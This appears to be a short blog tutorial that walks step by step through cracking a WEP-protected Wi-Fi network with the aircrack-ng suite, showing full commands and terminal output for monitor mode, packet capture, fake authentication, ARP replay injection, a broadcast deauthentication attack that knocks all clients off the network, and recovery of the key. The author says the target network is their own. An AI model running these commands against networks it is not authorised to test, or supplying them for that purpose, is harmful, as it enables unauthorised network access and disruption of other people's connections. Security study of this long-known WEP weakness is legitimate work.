AirCrack-ng Step by Step To Crack WEP

Cracking WEP is simple, and this attack is old, just wanted to document it.

  1. Step 1 is to put our wifi card into monitor mode, so we can start sniffing traffic.  We do this with airmon-ng
    rootKaliPi:~# airmon-ng start wlan0
    
    Found 3 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID     Name
    1616    dhclient
    2252    wpa_supplicant
    2295    dhclient
    Process with PID 2252 (wpa_supplicant) is running on interface wlan1
    Process with PID 2295 (dhclient) is running on interface wlan1
    
    Interface       Chipset         Driver
    
    wlan0           Atheros AR9271  ath9k - [phy1]
                                    (monitor mode enabled on mon0)
    wlan1           Realtek RTL8187L        rtl8187 - [phy0]
  2. Next step is to start airodump-ng to figure out which wifi we want to go after (your own… RIGHT?)
    root@KaliPi:~# airodump-ng mon0
     CH  8 ][ Elapsed: 4 s ][ 2013-11-15 14:30
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:00:00:00:00:01   -1        2        0    0   6  54 . OPN              asdf1
     00:00:00:00:00:02  -48       11       64   31   6  54e  WPA2 CCMP   PSK  asdf2
     00:00:00:00:00:03  -49        2        0    0   6  54e. WEP  WEP         asdf3
     00:00:00:00:00:04  -52        8        0    0   6  54e. WPA  TKIP   PSK  asdf4
     00:00:00:00:00:05  -54        3        0    0   6  54e. WEP  WEP         asdf5
     00:00:00:00:00:06  -55        2        0    0   6  54e. WEP  WEP         asdf6
     00:00:00:00:00:07  -56        6        0    0   6  54e. WEP  WEP         asdf7
  3. Since we’re doing an example of hacking WEP, we’ll pick MY Personally OWNED asdf3 (name obscured).  Now we need to set airodump-ng to write our packets to a file, and ONLY focus on that one AP.  We want to be precise with this, as any bad packets that get recorded in our packet file will break aircrack-ng.
    airodump-ng --ivs -w asdf3 --bssid 00:00:00:00:00:03 --channel 6 -a mon0
  4. Now, we need a 2nd window open.  We need to first authenticate to the network using aireplay-ng.  After the first successful association, you can cancel the command.
    root@KaliPi:~# aireplay-ng --fakeauth 6000 -o 1 -q 10 -a 00:00:00:00:00:03 mon0
    No source MAC (-h) specified. Using the device MAC (02:10:CD:A7:0B:44)
    14:40:59  Waiting for beacon frame (BSSID: 00:00:00:00:00:03) on channel 6
    
    14:40:59  Sending Authentication Request (Open System) [ACK]
    14:40:59  Authentication successful
    14:40:59  Sending Association Request [ACK]
    14:40:59  Association successful 🙂 (AID: 1)
    
    14:41:04  Sending keep-alive packet [ACK]
    14:41:14  Sending keep-alive packet [ACK]
    14:41:24  Sending keep-alive packet [ACK]
  5. Next we need to start mass producing ARP requests (which give us new IVs), via aireplay-ng.  What we want to see is the “got ## ARP requests” number to go crazy.  If it doesn’t, and sits at a low number for a few minutes, check the sub bullet
    root@KaliPi:~# aireplay-ng --arpreplay -b 00:00:00:00:00:03 mon0
    No source MAC (-h) specified. Using the device MAC (02:10:CD:A7:0B:44)
    14:43:37  Waiting for beacon frame (BSSID: 00:00:00:00:00:03) on channel 6
    Saving ARP requests in replay_arp-1115-144337.cap
    You should also start airodump-ng to capture replies.
    Read 1034 packets (got 66 ARP requests and 91 ACKs), sent 257 packets...(499 pps)
    Read 1103 packets (got 86 ARP requests and 110 ACKs), sent 307 packets...(499 pps)
    Read 1198 packets (got 102 ARP requests and 127 ACKs), sent 357 packets...(499 pps)
    Read 1332 packets (got 141 ARP requests and 165 ACKs), sent 407 packets...(499 pps)
    Read 1466 packets (got 175 ARP requests and 203 ACKs), sent 458 packets...(500 pps)
    Read 1620 packets (got 224 ARP requests and 242 ACKs), sent 507 packets...(499 pps)
    Read 1757 packets (got 257 ARP requests and 277 ACKs), sent 558 packets...(500 pps)
    Read 1898 packets (got 306 ARP requests and 320 ACKs), sent 607 packets...(499 pps)
    Read 2038 packets (got 345 ARP requests and 357 ACKs), sent 658 packets...(500 pps)
    Read 2164 packets (got 391 ARP requests and 392 ACKs), sent 708 packets...(500 pps)
    • To help generate packets, we can send out a deauthenticate packet.  This will tell every computer on the network to sign off (and then they will automatically sign right back on).   This will help to start generate some traffic.
      root@KaliPi:~# aireplay-ng --deauth 5 -a 00:00:00:00:00:03 mon0
      14:52:03  Waiting for beacon frame (BSSID: 00:00:00:00:00:03) on channel 6
      NB: this attack is more effective when targeting
      a connected wireless client (-c <client's mac>).
      14:52:04  Sending DeAuth to broadcast -- BSSID: [00:00:00:00:00:03]
      14:52:04  Sending DeAuth to broadcast -- BSSID: [00:00:00:00:00:03]
      14:52:05  Sending DeAuth to broadcast -- BSSID: [00:00:00:00:00:03]
      14:52:05  Sending DeAuth to broadcast -- BSSID: [00:00:00:00:00:03]
      14:52:06  Sending DeAuth to broadcast -- BSSID: [00:00:00:00:00:03]
  6. Next we’ll want to actually start cracking the saved IVs file.  Usually 5,000-10,000 IVs are required.  Its safe to start aircrack pretty soon after aireplay, as aircrack will reload every ~5,000 new IVs.
    root@KaliPi:~# aircrack-ng asdf3-01.ivs
    Opening asdf3-01.ivs
    Read 22068 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  00:00:00:00:00:03  asdf3                     WEP (22067 IVs)
    
    Choosing first network as target.
    
    Opening asdf3-01.ivs
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 24640 ivs.
                             KEY FOUND! [ AA:AA:AA:AA:AA ]
            Decrypted correctly: 100%

Comments are closed